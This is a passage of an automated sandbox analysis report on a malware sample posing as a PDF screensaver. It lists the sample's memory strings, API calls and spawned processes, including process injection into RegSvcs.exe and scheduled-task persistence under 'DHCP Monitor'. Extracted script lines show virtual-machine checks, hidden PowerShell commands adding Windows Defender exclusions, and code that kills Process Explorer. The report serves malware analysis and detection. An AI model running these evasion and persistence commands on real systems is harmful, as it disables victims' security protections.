Source: itugx.exe, 00000010.00000002.470505280.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.469351165.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465307309.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467780564.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465193535.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.507346397.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509588017.00000000012C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
Source: itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505153695.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509289794.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509361220.00000000012BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")L
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESUY;`D
Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES.
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904 Thread sleep count: 64 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748 Thread sleep count: 89 > 30 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1916 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028 Thread sleep count: 56 > 30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4136 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916 Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916 Thread sleep count: 96 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460 Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596 Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596 Thread sleep count: 82 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920 Thread sleep count: 55 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: threadDelayed 9667 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Window / User API: foregroundWindowGot 455 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe API coverage: 5.3 %
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior
Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VMwaretray.exe") Then#
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then=
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Thena46
Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe\Microso
Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe65687
Source: wscript.exe, 00000001.00000002.363558819.0000000002F60000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: en-USenVMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exe89
Source: wscript.exe, 0000000D.00000002.421779421.000001EDEF160000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: tBC:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
Source: rnnsh.xls.0.dr Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exeipt.S
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: name="VMware.VMware.vmui"
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenj0
Source: itugx.exe, 00000010.00000003.468344244.0000000001412000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe^`DE$
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenk5q
Source: wscript.exe, 00000016.00000002.491522356.0000021FFC240000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
Source: itugx.exe, 00000017.00000003.539485403.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe
Source: itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: rnnsh.xls.0.dr Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: wscript.exe, 00000001.00000003.361367465.00000000036F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exew
Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe6BA444D6.
Source: itugx.exe, 00000010.00000003.469045500.00000000013AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe3A765687
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe536C7
Source: itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exeS
Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: <description>"VMware Workstation"</description>
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462893753.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468154413.000000000140E000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465422358.00000000013FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exen*
Source: wscript.exe, 0000001B.00000002.534995230.0000025B9C8D0000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------[
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwaretray.exe#
Source: rnnsh.xls.0.dr Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo, 0_2_00CDE6A3
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00CCA69B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00CDC220
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CEB348 FindFirstFileExA, 0_2_00CEB348
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_0037E387
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0037D836
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_0038A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_0038A488
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose, 2_2_003865F1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0034C642 FindFirstFileExW, 2_2_0034C642
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00387248 FindFirstFileW,FindClose, 2_2_00387248
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_003872E9
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_0037DB69
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_00315D78
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h] 0_2_00CE7DEE
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00335078 mov eax, dword ptr fs:[00000030h] 2_2_00335078
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CDF838
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CEC030 GetProcessHeap, 0_2_00CEC030
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038F3FF BlockInput, 2_2_0038F3FF
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDF9D5 SetUnhandledExceptionFilter, 0_2_00CDF9D5
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00CDFBCA
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CE8EBD
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00330D65 SetUnhandledExceptionFilter, 2_2_00330D65
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_003429B2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00330BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00330BCF
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00330FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00330FB1

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11EE000
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037BB02 SendInput,keybd_event, 2_2_0037BB02
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp"
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $usb
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func disabler()
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;if antivirus() = "windows defender" then
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;#requireadmin
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;endif
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func antianalysis()
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process explorer")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp64.exe")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t6ecsz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: c:\windows\syswow64\wscript.exe\??\c:\windows\syswow64\wscript.exe;
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: 63209-405:en-usenwscript<
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: 23456789
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: h:mm:ss tt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: h:mm tt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: m/d/yyyymmmm yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp Binary or memory string: dddd, mmmm d, yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: maximum allowed array size (%u) is exceededcmtrrh%uhc%ux%uxc%u;%u
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\aclstmrtmp%d
